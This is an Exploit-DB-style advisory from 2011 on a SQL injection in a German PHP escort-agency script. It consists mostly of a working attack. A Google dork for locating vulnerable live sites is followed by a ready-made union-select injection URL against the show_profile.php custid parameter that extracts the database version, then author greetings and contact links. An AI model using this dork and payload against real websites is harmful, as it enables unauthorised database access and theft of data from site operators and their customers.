Escort und Begleitservice Agentur Script - SQL Injection

EDB-ID:

16117

CVE:



Author:

NoNameMT

Type:

webapps


Platform:

PHP

Date:

2011-02-05


# Exploit Title: Escort und Begleitservice Agentur Script SQL Injection
Vunerability
# Google Dork: inurl:show_profile.php?custid=
# Platform: php, webapp
# Date: 05.02.2011
# Author: NoNameMT
# Software Link:
http://www.media-products.de/escort-service-begleitagentur-v10-p-211.html
# Price: 22,50 €
# Version: 1.0
# Tested on: Windows 7
# Mail: nonamemt@gmail.com
# Homepage: http://nonamemt.us

# Exploit:
http://localhost/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,
28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+

Maybe there a diffrent number of columns

# Greetings:
J0hn.X3r, 4004-security-project.com, TamCore, bursali, theeddy42

-- 
Blog: www.nonamemt.us
Twitter: NoNameMT <http://twitter.com/NoNameMT>